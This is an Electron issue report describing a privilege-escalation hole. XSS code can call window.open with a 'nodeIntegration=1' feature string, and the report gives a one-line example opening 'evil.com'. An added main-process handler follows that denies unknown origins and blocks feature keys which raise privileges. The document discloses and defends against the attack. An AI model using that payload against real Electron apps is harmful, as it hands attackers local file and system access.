Closed
opened on Jan 8, 2016
A developer might disable Node integration in a browser window to limit the damage that an XSS attack could cause. But if an XSS attack could open a window to its own endpoint and, when opening the window, re-enable Node integration, this is moot:
```js
// JavaScript on 'evil.com' will be able to `require('fs')` etc.
window.open('http://evil.com', '', 'nodeIntegration=1');
```
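A main-process guard against the scenario described in this issue, as an added example that is not part of the original issue or Electron's own code. It assumes Electron 12 or later, where `webContents.setWindowOpenHandler` passes the requested `url` and `features` string to a handler; `ALLOWED_ORIGINS`, `app.example.com`, the key lists and the function names are assumptions for illustration.

```javascript
// Added example: main-process policy for windows requested via window.open().
// ALLOWED_ORIGINS, the key lists and the function names are illustrative assumptions.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']); // constructed value

// webPreferences a renderer must not switch on, or switch off, via a features string.
const MUST_STAY_OFF = new Set(['nodeintegration', 'nodeintegrationinworker', 'webviewtag', 'preload']);
const MUST_STAY_ON = new Set(['contextisolation', 'sandbox', 'websecurity']);

// Parse "a=1,b=no,c" into a Map of lower-cased keys to true/false/raw string.
function parseFeatures(features) {
  const out = new Map();
  for (const part of String(features || '').split(',')) {
    const [rawKey, rawVal = 'yes'] = part.split('=');
    const key = rawKey.trim().toLowerCase();
    if (!key) continue;
    const val = rawVal.trim().toLowerCase();
    if (['1', 'yes', 'true'].includes(val)) out.set(key, true);
    else if (['0', 'no', 'false'].includes(val)) out.set(key, false);
    else out.set(key, val);
  }
  return out;
}

// List the feature keys that try to raise the child window's privileges.
function privilegedRequests(features) {
  const asked = [];
  for (const [key, val] of parseFeatures(features)) {
    if (MUST_STAY_OFF.has(key) && val !== false) asked.push(key);
    if (MUST_STAY_ON.has(key) && val === false) asked.push(key);
  }
  return asked;
}

// Handler: deny unknown origins and privilege requests, pin safe preferences otherwise.
function windowOpenPolicy({ url, features }) {
  let origin;
  try { origin = new URL(url).origin; } catch { return { action: 'deny' }; }
  if (!ALLOWED_ORIGINS.has(origin)) return { action: 'deny' };
  if (privilegedRequests(features).length > 0) return { action: 'deny' };
  return {
    action: 'allow',
    overrideBrowserWindowOptions: {
      webPreferences: { nodeIntegration: false, contextIsolation: true, sandbox: true },
    },
  };
}

// In the main process: mainWindow.webContents.setWindowOpenHandler(windowOpenPolicy);
```

Logging the result of `privilegedRequests` for denied requests gives a useful signal that a renderer has attempted to escalate.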